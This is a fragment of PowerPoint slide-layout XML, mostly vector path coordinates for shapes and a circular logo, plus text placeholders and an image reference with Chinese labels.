                  <a:pt x="4629151" y="844261"/>
                  <a:pt x="4629151" y="778831"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4629151" y="237448"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4629151" y="171491"/>
                  <a:pt x="4652368" y="115426"/>
                  <a:pt x="4698802" y="69256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4745237" y="23085"/>
                  <a:pt x="4800905" y="0"/>
                  <a:pt x="4865807" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3513230" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3566525" y="0"/>
                  <a:pt x="3612167" y="11872"/>
                  <a:pt x="3650159" y="35617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3679708" y="54085"/>
                  <a:pt x="3703585" y="79941"/>
                  <a:pt x="3721790" y="113184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3739994" y="146427"/>
                  <a:pt x="3750943" y="184682"/>
                  <a:pt x="3754636" y="227951"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3611376" y="254070"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3607154" y="213440"/>
                  <a:pt x="3595546" y="181780"/>
                  <a:pt x="3576550" y="159090"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3562831" y="142733"/>
                  <a:pt x="3543043" y="134554"/>
                  <a:pt x="3517188" y="134554"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3489750" y="134554"/>
                  <a:pt x="3468907" y="146690"/>
                  <a:pt x="3454660" y="170963"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3443051" y="190486"/>
                  <a:pt x="3437247" y="214759"/>
                  <a:pt x="3437247" y="243780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3437247" y="289159"/>
                  <a:pt x="3456771" y="335330"/>
                  <a:pt x="3495818" y="382292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3510592" y="400233"/>
                  <a:pt x="3532754" y="421339"/>
                  <a:pt x="3562303" y="445612"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3597129" y="474633"/>
                  <a:pt x="3620082" y="494948"/>
                  <a:pt x="3631163" y="506557"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3668099" y="543493"/>
                  <a:pt x="3696593" y="579902"/>
                  <a:pt x="3716645" y="615783"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3726143" y="632668"/>
                  <a:pt x="3733794" y="648234"/>
                  <a:pt x="3739598" y="662481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3753845" y="697835"/>
                  <a:pt x="3761232" y="729495"/>
                  <a:pt x="3761760" y="757461"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3762815" y="826585"/>
                  <a:pt x="3744874" y="885683"/>
                  <a:pt x="3707938" y="934756"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3683665" y="967998"/>
                  <a:pt x="3649367" y="991479"/>
                  <a:pt x="3605044" y="1005199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3581299" y="1012586"/>
                  <a:pt x="3553597" y="1016280"/>
                  <a:pt x="3521937" y="1016280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3463367" y="1016280"/>
                  <a:pt x="3414821" y="1001769"/>
                  <a:pt x="3376302" y="972747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3344115" y="949003"/>
                  <a:pt x="3318655" y="916683"/>
                  <a:pt x="3299923" y="875789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3281191" y="834895"/>
                  <a:pt x="3270241" y="788065"/>
                  <a:pt x="3267076" y="735299"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3409545" y="725009"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3415877" y="782822"/>
                  <a:pt x="3431179" y="824721"/>
                  <a:pt x="3455452" y="850709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3473392" y="870331"/>
                  <a:pt x="3493971" y="879615"/>
                  <a:pt x="3517188" y="878559"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3549903" y="877504"/>
                  <a:pt x="3576023" y="861394"/>
                  <a:pt x="3595546" y="830229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3605571" y="814918"/>
                  <a:pt x="3610584" y="793004"/>
                  <a:pt x="3610584" y="764485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3610584" y="723286"/>
                  <a:pt x="3591852" y="682355"/>
                  <a:pt x="3554388" y="641692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3524839" y="613701"/>
                  <a:pt x="3480516" y="571715"/>
                  <a:pt x="3421417" y="515733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3371817" y="467666"/>
                  <a:pt x="3336727" y="424621"/>
                  <a:pt x="3316148" y="386596"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3293987" y="343814"/>
                  <a:pt x="3282905" y="297338"/>
                  <a:pt x="3282905" y="247169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3282905" y="156856"/>
                  <a:pt x="3313246" y="88462"/>
                  <a:pt x="3373927" y="41986"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3411392" y="13995"/>
                  <a:pt x="3457826" y="0"/>
                  <a:pt x="35132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300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bebas" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="椭圆 55"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4825750" y="3795516"/>
            <a:ext cx="220164" cy="2201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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7146086" y="3795516"/>
            <a:ext cx="220164" cy="2201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文本占位符 57"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5222039" y="3736096"/>
            <a:ext cx="1747925" cy="353120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1747925"/>
              <a:gd name="connsiteY0" fmla="*/ 176559 h 353120"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 1747925"/>
              <a:gd name="connsiteY1" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1747925"/>
              <a:gd name="connsiteY2" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX3" fmla="*/ 176560 w 1747925"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 353120"/>
              <a:gd name="connsiteX4" fmla="*/ 1571365 w 1747925"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 353120"/>
              <a:gd name="connsiteX5" fmla="*/ 1747925 w 1747925"/>
              <a:gd name="connsiteY5" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX6" fmla="*/ 1747924 w 1747925"/>
              <a:gd name="connsiteY6" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX7" fmla="*/ 1571364 w 1747925"/>
              <a:gd name="connsiteY7" fmla="*/ 353120 h 353120"/>
              <a:gd name="connsiteX8" fmla="*/ 176560 w 1747925"/>
              <a:gd name="connsiteY8" fmla="*/ 353119 h 353120"/>
              <a:gd name="connsiteX9" fmla="*/ 13875 w 1747925"/>
              <a:gd name="connsiteY9" fmla="*/ 245284 h 353120"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 1747925"/>
              <a:gd name="connsiteY10" fmla="*/ 176560 h 353120"/>
              <a:gd name="connsiteX11" fmla="*/ 13875 w 1747925"/>
              <a:gd name="connsiteY11" fmla="*/ 107835 h 353120"/>
              <a:gd name="connsiteX12" fmla="*/ 176560 w 1747925"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 35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47925" h="353120">
                <a:moveTo>
                  <a:pt x="0" y="176559"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="176560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176560"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="176560" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1571365" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1668876" y="0"/>
                  <a:pt x="1747925" y="79049"/>
                  <a:pt x="1747925" y="176560"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1747924" y="176560"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1747924" y="274071"/>
                  <a:pt x="1668875" y="353120"/>
                  <a:pt x="1571364" y="353120"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="176560" y="353119"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="103427" y="353119"/>
                  <a:pt x="40679" y="308654"/>
                  <a:pt x="13875" y="245284"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="176560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13875" y="107835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="40679" y="44465"/>
                  <a:pt x="103427" y="0"/>
                  <a:pt x="17656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altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5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81523" y="4270222"/>
            <a:ext cx="302895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5286641"/>
            <a:ext cx="10858500" cy="541635"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="32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1" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="5840173"/>
            <a:ext cx="10845800" cy="29627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204" y="1172335"/>
            <a:ext cx="1967592" cy="5182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树, 天空, 户外, 道路&#10;&#10;自动生成的说明"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8" cstate="screen">
            <a:alphaModFix amt="20000"/>
          </a:blip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90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"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6570000"/>
            <a:ext cx="12192000" cy="28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660400" y="817563"/>
            <a:ext cx="108585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35f8ada8-d1d5-484b-a646-0693bbf3215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 userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10054544" y="286022"/>
            <a:ext cx="1464356" cy="442149"/>
            <a:chOff x="3126770" y="2552633"/>
            <a:chExt cx="5689224" cy="1717810"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="íṣlîḍé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3126770" y="2552633"/>
              <a:ext cx="1713720" cy="1717810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 266 w 531"/>
                <a:gd name="T1" fmla="*/ 0 h 531"/>
                <a:gd name="T2" fmla="*/ 266 w 531"/>
                <a:gd name="T3" fmla="*/ 0 h 531"/>
                <a:gd name="T4" fmla="*/ 266 w 531"/>
                <a:gd name="T5" fmla="*/ 0 h 531"/>
                <a:gd name="T6" fmla="*/ 454 w 531"/>
                <a:gd name="T7" fmla="*/ 78 h 531"/>
                <a:gd name="T8" fmla="*/ 531 w 531"/>
                <a:gd name="T9" fmla="*/ 265 h 531"/>
                <a:gd name="T10" fmla="*/ 531 w 531"/>
                <a:gd name="T11" fmla="*/ 265 h 531"/>
                <a:gd name="T12" fmla="*/ 531 w 531"/>
                <a:gd name="T13" fmla="*/ 265 h 531"/>
                <a:gd name="T14" fmla="*/ 531 w 531"/>
                <a:gd name="T15" fmla="*/ 265 h 531"/>
                <a:gd name="T16" fmla="*/ 531 w 531"/>
                <a:gd name="T17" fmla="*/ 265 h 531"/>
                <a:gd name="T18" fmla="*/ 454 w 531"/>
                <a:gd name="T19" fmla="*/ 453 h 531"/>
                <a:gd name="T20" fmla="*/ 266 w 531"/>
                <a:gd name="T21" fmla="*/ 531 h 531"/>
                <a:gd name="T22" fmla="*/ 266 w 531"/>
                <a:gd name="T23" fmla="*/ 531 h 531"/>
                <a:gd name="T24" fmla="*/ 266 w 531"/>
                <a:gd name="T25" fmla="*/ 531 h 531"/>
                <a:gd name="T26" fmla="*/ 266 w 531"/>
                <a:gd name="T27" fmla="*/ 531 h 531"/>
                <a:gd name="T28" fmla="*/ 266 w 531"/>
                <a:gd name="T29" fmla="*/ 531 h 531"/>
                <a:gd name="T30" fmla="*/ 78 w 531"/>
                <a:gd name="T31" fmla="*/ 453 h 531"/>
                <a:gd name="T32" fmla="*/ 0 w 531"/>
                <a:gd name="T33" fmla="*/ 265 h 531"/>
                <a:gd name="T34" fmla="*/ 0 w 531"/>
                <a:gd name="T35" fmla="*/ 265 h 531"/>
                <a:gd name="T36" fmla="*/ 0 w 531"/>
                <a:gd name="T37" fmla="*/ 265 h 531"/>
                <a:gd name="T38" fmla="*/ 0 w 531"/>
                <a:gd name="T39" fmla="*/ 265 h 531"/>
                <a:gd name="T40" fmla="*/ 0 w 531"/>
                <a:gd name="T41" fmla="*/ 265 h 531"/>
                <a:gd name="T42" fmla="*/ 78 w 531"/>
                <a:gd name="T43" fmla="*/ 78 h 531"/>
                <a:gd name="T44" fmla="*/ 266 w 531"/>
                <a:gd name="T45" fmla="*/ 0 h 531"/>
                <a:gd name="T46" fmla="*/ 266 w 531"/>
                <a:gd name="T47" fmla="*/ 0 h 531"/>
                <a:gd name="T48" fmla="*/ 266 w 531"/>
                <a:gd name="T49" fmla="*/ 0 h 531"/>
                <a:gd name="T50" fmla="*/ 266 w 531"/>
                <a:gd name="T51" fmla="*/ 6 h 531"/>
                <a:gd name="T52" fmla="*/ 266 w 531"/>
                <a:gd name="T53" fmla="*/ 6 h 531"/>
                <a:gd name="T54" fmla="*/ 266 w 531"/>
                <a:gd name="T55" fmla="*/ 6 h 531"/>
                <a:gd name="T56" fmla="*/ 266 w 531"/>
                <a:gd name="T57" fmla="*/ 6 h 531"/>
                <a:gd name="T58" fmla="*/ 266 w 531"/>
                <a:gd name="T59" fmla="*/ 6 h 531"/>
                <a:gd name="T60" fmla="*/ 82 w 531"/>
                <a:gd name="T61" fmla="*/ 82 h 531"/>
                <a:gd name="T62" fmla="*/ 6 w 531"/>
                <a:gd name="T63" fmla="*/ 265 h 531"/>
                <a:gd name="T64" fmla="*/ 6 w 531"/>
                <a:gd name="T65" fmla="*/ 265 h 531"/>
                <a:gd name="T66" fmla="*/ 6 w 531"/>
                <a:gd name="T67" fmla="*/ 265 h 531"/>
                <a:gd name="T68" fmla="*/ 6 w 531"/>
                <a:gd name="T69" fmla="*/ 265 h 531"/>
                <a:gd name="T70" fmla="*/ 6 w 531"/>
                <a:gd name="T71" fmla="*/ 265 h 531"/>
                <a:gd name="T72" fmla="*/ 82 w 531"/>
                <a:gd name="T73" fmla="*/ 449 h 531"/>
                <a:gd name="T74" fmla="*/ 266 w 531"/>
                <a:gd name="T75" fmla="*/ 525 h 531"/>
                <a:gd name="T76" fmla="*/ 266 w 531"/>
                <a:gd name="T77" fmla="*/ 525 h 531"/>
                <a:gd name="T78" fmla="*/ 266 w 531"/>
                <a:gd name="T79" fmla="*/ 525 h 531"/>
                <a:gd name="T80" fmla="*/ 266 w 531"/>
                <a:gd name="T81" fmla="*/ 525 h 531"/>
                <a:gd name="T82" fmla="*/ 266 w 531"/>
                <a:gd name="T83" fmla="*/ 525 h 531"/>
                <a:gd name="T84" fmla="*/ 449 w 531"/>
                <a:gd name="T85" fmla="*/ 449 h 531"/>
                <a:gd name="T86" fmla="*/ 525 w 531"/>
                <a:gd name="T87" fmla="*/ 265 h 531"/>
                <a:gd name="T88" fmla="*/ 525 w 531"/>
                <a:gd name="T89" fmla="*/ 265 h 531"/>
                <a:gd name="T90" fmla="*/ 525 w 531"/>
                <a:gd name="T91" fmla="*/ 265 h 531"/>
                <a:gd name="T92" fmla="*/ 525 w 531"/>
                <a:gd name="T93" fmla="*/ 265 h 531"/>
                <a:gd name="T94" fmla="*/ 525 w 531"/>
                <a:gd name="T95" fmla="*/ 265 h 531"/>
                <a:gd name="T96" fmla="*/ 449 w 531"/>
                <a:gd name="T97" fmla="*/ 82 h 531"/>
                <a:gd name="T98" fmla="*/ 266 w 531"/>
                <a:gd name="T99" fmla="*/ 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31" h="531">
                  <a:moveTo>
                    <a:pt x="266" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="0"/>
                    <a:pt x="266" y="0"/>
                    <a:pt x="266" y="0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339" y="0"/>
                    <a:pt x="405" y="30"/>
                    <a:pt x="454" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="502" y="126"/>
                    <a:pt x="531" y="192"/>
                    <a:pt x="531" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="265"/>
                    <a:pt x="531" y="265"/>
                    <a:pt x="531" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="265"/>
                    <a:pt x="531" y="265"/>
                    <a:pt x="531" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="265"/>
                    <a:pt x="531" y="265"/>
                    <a:pt x="531" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="265"/>
                    <a:pt x="531" y="265"/>
                    <a:pt x="531" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="339"/>
                    <a:pt x="502" y="405"/>
                    <a:pt x="454" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="501"/>
                    <a:pt x="339" y="531"/>
                    <a:pt x="266" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="531"/>
                    <a:pt x="266" y="531"/>
                    <a:pt x="266" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="531"/>
                    <a:pt x="266" y="531"/>
                    <a:pt x="266" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="531"/>
                    <a:pt x="266" y="531"/>
                    <a:pt x="266" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="531"/>
                    <a:pt x="266" y="531"/>
                    <a:pt x="266" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="531"/>
                    <a:pt x="126" y="501"/>
                    <a:pt x="78" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="405"/>
                    <a:pt x="0" y="339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192"/>
                    <a:pt x="30" y="126"/>
                    <a:pt x="78" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="266" y="0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266" y="0"/>
                    <a:pt x="266" y="0"/>
                    <a:pt x="266" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="266" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="6"/>
                    <a:pt x="266" y="6"/>
                    <a:pt x="266" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="6"/>
                    <a:pt x="266" y="6"/>
                    <a:pt x="266" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="6"/>
                    <a:pt x="266" y="6"/>
                    <a:pt x="266" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="6"/>
                    <a:pt x="266" y="6"/>
                    <a:pt x="266" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="6"/>
                    <a:pt x="129" y="35"/>
                    <a:pt x="82" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="129"/>
                    <a:pt x="6" y="194"/>
                    <a:pt x="6" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="265"/>
                    <a:pt x="6" y="265"/>
                    <a:pt x="6" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="265"/>
                    <a:pt x="6" y="265"/>
                    <a:pt x="6" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="265"/>
                    <a:pt x="6" y="265"/>
                    <a:pt x="6" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="265"/>
                    <a:pt x="6" y="265"/>
                    <a:pt x="6" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="337"/>
                    <a:pt x="35" y="402"/>
                    <a:pt x="82" y="449"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="496"/>
                    <a:pt x="194" y="525"/>
                    <a:pt x="266" y="525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="525"/>
                    <a:pt x="266" y="525"/>
                    <a:pt x="266" y="525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="525"/>
                    <a:pt x="266" y="525"/>
                    <a:pt x="266" y="525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="525"/>
                    <a:pt x="266" y="525"/>
                    <a:pt x="266" y="525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="525"/>
                    <a:pt x="266" y="525"/>
                    <a:pt x="266" y="525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="525"/>
                    <a:pt x="402" y="496"/>
                    <a:pt x="449" y="449"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="496" y="402"/>
                    <a:pt x="525" y="337"/>
                    <a:pt x="525" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="265"/>
                    <a:pt x="525" y="265"/>
                    <a:pt x="525" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="265"/>
                    <a:pt x="525" y="265"/>
                    <a:pt x="525" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="265"/>
                    <a:pt x="525" y="265"/>
                    <a:pt x="525" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="265"/>
                    <a:pt x="525" y="265"/>
                    <a:pt x="525" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="194"/>
                    <a:pt x="496" y="129"/>
                    <a:pt x="449" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="35"/>
                    <a:pt x="337" y="6"/>
                    <a:pt x="26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ṧlïḑe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3346268" y="2769404"/>
              <a:ext cx="1277451" cy="1281541"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198 w 396"/>
                <a:gd name="T1" fmla="*/ 0 h 396"/>
                <a:gd name="T2" fmla="*/ 198 w 396"/>
                <a:gd name="T3" fmla="*/ 0 h 396"/>
                <a:gd name="T4" fmla="*/ 198 w 396"/>
                <a:gd name="T5" fmla="*/ 0 h 396"/>
                <a:gd name="T6" fmla="*/ 338 w 396"/>
                <a:gd name="T7" fmla="*/ 58 h 396"/>
                <a:gd name="T8" fmla="*/ 396 w 396"/>
                <a:gd name="T9" fmla="*/ 198 h 396"/>
                <a:gd name="T10" fmla="*/ 396 w 396"/>
                <a:gd name="T11" fmla="*/ 198 h 396"/>
                <a:gd name="T12" fmla="*/ 396 w 396"/>
                <a:gd name="T13" fmla="*/ 198 h 396"/>
                <a:gd name="T14" fmla="*/ 396 w 396"/>
                <a:gd name="T15" fmla="*/ 198 h 396"/>
                <a:gd name="T16" fmla="*/ 396 w 396"/>
                <a:gd name="T17" fmla="*/ 198 h 396"/>
                <a:gd name="T18" fmla="*/ 338 w 396"/>
                <a:gd name="T19" fmla="*/ 338 h 396"/>
                <a:gd name="T20" fmla="*/ 198 w 396"/>
                <a:gd name="T21" fmla="*/ 396 h 396"/>
                <a:gd name="T22" fmla="*/ 198 w 396"/>
                <a:gd name="T23" fmla="*/ 396 h 396"/>
                <a:gd name="T24" fmla="*/ 198 w 396"/>
                <a:gd name="T25" fmla="*/ 396 h 396"/>
                <a:gd name="T26" fmla="*/ 198 w 396"/>
                <a:gd name="T27" fmla="*/ 396 h 396"/>
                <a:gd name="T28" fmla="*/ 198 w 396"/>
                <a:gd name="T29" fmla="*/ 396 h 396"/>
                <a:gd name="T30" fmla="*/ 58 w 396"/>
                <a:gd name="T31" fmla="*/ 338 h 396"/>
                <a:gd name="T32" fmla="*/ 0 w 396"/>
                <a:gd name="T33" fmla="*/ 198 h 396"/>
                <a:gd name="T34" fmla="*/ 0 w 396"/>
                <a:gd name="T35" fmla="*/ 198 h 396"/>
                <a:gd name="T36" fmla="*/ 0 w 396"/>
                <a:gd name="T37" fmla="*/ 198 h 396"/>
                <a:gd name="T38" fmla="*/ 0 w 396"/>
                <a:gd name="T39" fmla="*/ 198 h 396"/>
                <a:gd name="T40" fmla="*/ 0 w 396"/>
                <a:gd name="T41" fmla="*/ 198 h 396"/>
                <a:gd name="T42" fmla="*/ 58 w 396"/>
                <a:gd name="T43" fmla="*/ 58 h 396"/>
                <a:gd name="T44" fmla="*/ 198 w 396"/>
                <a:gd name="T45" fmla="*/ 0 h 396"/>
                <a:gd name="T46" fmla="*/ 198 w 396"/>
                <a:gd name="T47" fmla="*/ 0 h 396"/>
                <a:gd name="T48" fmla="*/ 198 w 396"/>
                <a:gd name="T49" fmla="*/ 0 h 396"/>
                <a:gd name="T50" fmla="*/ 198 w 396"/>
                <a:gd name="T51" fmla="*/ 6 h 396"/>
                <a:gd name="T52" fmla="*/ 198 w 396"/>
                <a:gd name="T53" fmla="*/ 6 h 396"/>
                <a:gd name="T54" fmla="*/ 198 w 396"/>
                <a:gd name="T55" fmla="*/ 6 h 396"/>
                <a:gd name="T56" fmla="*/ 198 w 396"/>
                <a:gd name="T57" fmla="*/ 6 h 396"/>
                <a:gd name="T58" fmla="*/ 198 w 396"/>
                <a:gd name="T59" fmla="*/ 6 h 396"/>
                <a:gd name="T60" fmla="*/ 62 w 396"/>
                <a:gd name="T61" fmla="*/ 62 h 396"/>
                <a:gd name="T62" fmla="*/ 6 w 396"/>
                <a:gd name="T63" fmla="*/ 198 h 396"/>
                <a:gd name="T64" fmla="*/ 6 w 396"/>
                <a:gd name="T65" fmla="*/ 198 h 396"/>
                <a:gd name="T66" fmla="*/ 6 w 396"/>
                <a:gd name="T67" fmla="*/ 198 h 396"/>
                <a:gd name="T68" fmla="*/ 6 w 396"/>
                <a:gd name="T69" fmla="*/ 198 h 396"/>
                <a:gd name="T70" fmla="*/ 6 w 396"/>
                <a:gd name="T71" fmla="*/ 198 h 396"/>
                <a:gd name="T72" fmla="*/ 62 w 396"/>
                <a:gd name="T73" fmla="*/ 334 h 396"/>
                <a:gd name="T74" fmla="*/ 198 w 396"/>
                <a:gd name="T75" fmla="*/ 391 h 396"/>
                <a:gd name="T76" fmla="*/ 198 w 396"/>
                <a:gd name="T77" fmla="*/ 391 h 396"/>
                <a:gd name="T78" fmla="*/ 198 w 396"/>
                <a:gd name="T79" fmla="*/ 391 h 396"/>
                <a:gd name="T80" fmla="*/ 198 w 396"/>
                <a:gd name="T81" fmla="*/ 391 h 396"/>
                <a:gd name="T82" fmla="*/ 198 w 396"/>
